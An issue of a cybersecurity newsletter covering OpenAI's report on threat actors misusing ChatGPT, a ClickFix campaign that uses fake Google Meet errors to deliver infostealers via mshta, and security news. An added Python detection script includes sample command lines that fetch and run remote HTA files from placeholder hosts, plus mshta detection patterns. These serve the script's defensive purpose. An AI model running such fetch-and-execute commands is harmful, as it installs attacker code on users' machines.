ClickFix Targets Google Meets
Your latest excuse to avoid joining random meetings
The Weekend Byte is a weekly overview of the most important news and events in cybersecurity and AI, captured and analyzed by Jason Rebholz.
I’m back from an awesome vacation and somehow still recovering from jetlag almost a week later. Twelve-hour time differences are no joke...at least it’s cool and socially acceptable to fall asleep at 7:30 PM as an adult…right?
The celebrations continue here, too. This month, The Weekend Byte turns one year old!
Thank you to all of you nerds who tune in each week for my terrible attempts at humor, mediocre gifs, and cyber/AI knowledge. Alright, let’s get to it. Today, we’re covering:
Nation-states dabbling in AI
A new reason not to join meetings
Companion AI chats stolen…very awkward
-Jason
AI Spotlight
Threat Actors Are Dabbling in AI
OpenAI released its latest Influence and Cyber Operations report. It’s an update from their prior report, which we covered in Nation-States Using ChatGPT for Creativity.
This latest report details their findings from identifying, preventing, and disrupting malicious actors’ attempts at using ChatGPT for “harmful ends.” So far this year, OpenAI has disrupted over 20 operations.
As cybersecurity nerds, we must monitor how threat actors use AI to support their operations. It’s a glimpse into what the future of security will look like. OpenAI had this to say about it:
Threat actors continue to evolve and experiment with our models, but we have not seen evidence of this leading to meaningful breakthroughs in their ability to create substantially new malware or build viral audiences.
Here’s a summary of OpenAI’s case studies that detailed how threat actors are using AI in their cyber operations:
Reconnaissance: Prepping an attack
Asking about vulnerabilities in various applications
Asking for more detailed information on specific vulnerabilities
Asking for default passwords for specific software
Determining popular software and devices used in specific locations
Translating LinkedIn profiles to different languages
Social Engineering: Support in Tricking Humans
Asking for themes that certain groups of people will find interesting
Asking for variations of attacker-provided job recruitment messages
Coding Support: Expedite troubleshooting and creating malicious code
Support in debugging code that can send text messages for smishing campaigns
Support in debugging and implementing an Instagram scraper
Support in debugging and developing Android malware
Asking to create obfuscated scripts
Attack Support: Facilitating hacking
Asking questions on how to use malicious tools
Asking for support in dumping passwords from Windows and Mac devices
Disinformation: Spreading fake content
Creating images for use on social media
Create short-form comments
Create long-form articles
Create social media personas
Analyze posts and comments
Manage 150 social media accounts
OpenAI reiterated throughout the report that the threat actors’ use of ChatGPT did not appear to provide “novel capabilities or directions” that could not have otherwise been obtained from publicly available resources.
Interestingly, regarding some ChatGPT usage, like coding, the language shifted slightly, stating that ChatGPT “only offered limited, incremental capabilities for malicious cybersecurity tasks.”
So, while we’re not at the point where your grandma can use ChatGPT to launch a cyberattack, we are clearly at a point where someone with the requisite knowledge of how to hack can gain efficiencies in what they do. It's not terrible, but it's not great.
Security Deep Dive
A New Reason Not to Join Meetings
I’ll let you decide if this new attack technique would be effective against you…it relies on your desire to attend meetings.
The attack uses a social engineering tactic known as ClickFix. This basic tactic gives the victim clear instructions that lead them to unknowingly run malicious code on their system, usually under the guise of fixing an error with the application they are trying to run. That code often leads to installing an infostealer on their system.
Per a recent Sekoia blog post, a ClickFix campaign attempted to trick users into joining a Google Meet meeting. Users who click on the link are presented with this screen showing a fake error message:
Source: Sekoia’s blog
As you can see, the user is prompted to click “Fix It” on the screen, which copies text to their clipboard. Then, the user is supposed to press their Windows key, copy the text, and press Enter, which would run the copied text.
In this campaign, the copied text would run the legitimate Microsoft mshta program to download and run HTML Application (HTA) files. While legitimate purposes exist for that functionality, attackers like to misuse it because attackers are gonna attack. Here, the HTA file contained a malicious VBScript, an old Windows scripting language that can run commands on the system.
That VBScript downloaded two malicious infostealers capable of stealing passwords and sensitive data from Windows machines. And don’t worry, Mac users, you aren’t left out. A version of this also led to the AMOS Stealer for you.
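The defender-side takeaway from this campaign is that the whole chain starts with a user-driven launch of mshta.exe against a remote HTA. Below is an added example of simple triage logic over process-creation telemetry; it is not code from the newsletter or from Sekoia’s write-up. The events are constructed Sysmon-style records (image, command line, parent image), the URL and hostname values are placeholders, and the scoring thresholds are my own assumptions rather than any vendor’s rule.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style).
# These are not real telemetry; hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {   # ClickFix pattern: mshta launched from the shell with a remote HTA URL
        "image": r"C:\Windows\System32\mshta.exe",
        "command_line": "mshta https://example.invalid/meet/fix.hta",
        "parent_image": r"C:\Windows\explorer.exe",
    },
    {   # Benign-looking use: installer runs a local HTA
        "image": r"C:\Windows\System32\mshta.exe",
        "command_line": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\setup.hta"',
        "parent_image": r"C:\Program Files\Vendor\setup.exe",
    },
    {   # Unrelated process
        "image": r"C:\Windows\System32\notepad.exe",
        "command_line": "notepad.exe notes.txt",
        "parent_image": r"C:\Windows\explorer.exe",
    },
    {   # mshta hidden inside a PowerShell one-liner pasted into the Run dialog
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": 'powershell -w hidden -c "mshta http://example.invalid/x.hta"',
        "parent_image": r"C:\Windows\explorer.exe",
    },
]

# A URL argument anywhere in the command line.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# "mshta" or "mshta.exe" as a standalone token (start of line, after a path
# separator, whitespace or a quote), so "mshta" inside another word is ignored.
MSHTA_RE = re.compile(r"(^|[\\\s\"'])mshta(\.exe)?([\s\"']|$)", re.IGNORECASE)


def is_mshta_launch(event):
    """True if the process is mshta.exe or its command line invokes mshta."""
    image = event.get("image", "").lower()
    cmd = event.get("command_line", "")
    return image.endswith("\\mshta.exe") or bool(MSHTA_RE.search(cmd))


def score_event(event):
    """Return a finding dict for mshta activity, or None if not mshta-related."""
    if not is_mshta_launch(event):
        return None
    cmd = event.get("command_line", "")
    parent = event.get("parent_image", "").lower()
    reasons = []
    severity = "low"  # assumed default: local HTA from a non-shell parent
    if URL_RE.search(cmd):
        # The ClickFix lure has the user run mshta against an attacker URL,
        # so mshta fetching an HTA over HTTP(S) is the strongest signal here.
        reasons.append("mshta given a remote URL (HTA fetched over HTTP)")
        severity = "high"
    if parent.endswith("\\explorer.exe"):
        # The Run dialog the lure asks the user to open is hosted by
        # explorer.exe, so that parent matches the user-pasted launch path.
        reasons.append("parent is explorer.exe, consistent with a user-pasted Run dialog launch")
        if severity != "high":
            severity = "medium"
    if not reasons:
        reasons.append("mshta with a local HTA path; review the file if unexpected")
    return {"severity": severity, "reasons": reasons, "command_line": cmd}


def triage(events):
    """Return (index, finding) pairs for every event that involves mshta."""
    results = []
    for i, event in enumerate(events):
        finding = score_event(event)
        if finding is not None:
            results.append((i, finding))
    return results


if __name__ == "__main__":
    for idx, finding in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {finding['severity']:6s} {finding['command_line']}")
        for r in finding["reasons"]:
            print(f"    - {r}")
```

The second rule matters because the first can be defeated by staging the HTA locally first; requiring only mshta-from-explorer would be noisy on its own, so the two are combined into a score rather than treated as separate alerts.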
In the News
What Else is Happening?
💋 Online AI Companion Chat muah.ai was hacked. Calling it an AI Companion chat is the PG version. Said differently, it’s an AI app where you can have…umm…adult conversations of a particular private nature. Well, now all those private conversations are in the hands of the attacker who hacked the site and now is purportedly attempting to extort users.
😨 The UN Office on Drugs and Crime (UNODC) stated that “organized crime groups are converging and exploiting vulnerabilities, and the evolving situation is rapidly outpacing governments’ capacity to contain it.” They also state that financial losses in 2023 alone for victims in East and Southeast Asia range between $18 and $37 billion…yikes.
🧹 Hackers took control of numerous Ecovacs Deebot X2 robot vacuum cleaners. This led to the robots chasing dogs around houses and the hackers yelling obscenities at the homeowners through the vacuum’s onboard speakers. Per Ecovacs, this stemmed from a credential stuffing attack in which the owners’ credentials were obtained from other breaches and used to log into their Ecovacs account.
🛒 Amazon reported that over 175 million Amazon customers are using passkeys to secure their accounts! If you haven’t done this, go to your account’s Login & Security settings. It takes almost no time to set up!
🇧🇷 Brazilian authorities arrested the USDoD hacker behind the National Public Data breach. In a strange series of events, after USDoD hacked CrowdStrike and released the company’s internal threat actor list, a CrowdStrike document that included USDoD’s real identity was given to reporters…which USDoD confirmed was legitimate. Meanwhile, National Public Data filed for Chapter 11 bankruptcy in the face of all the incoming litigation.
If you enjoyed this, forward it to a fellow cyber nerd.
If you’re that fellow cyber nerd, subscribe here.
See you next week, nerd!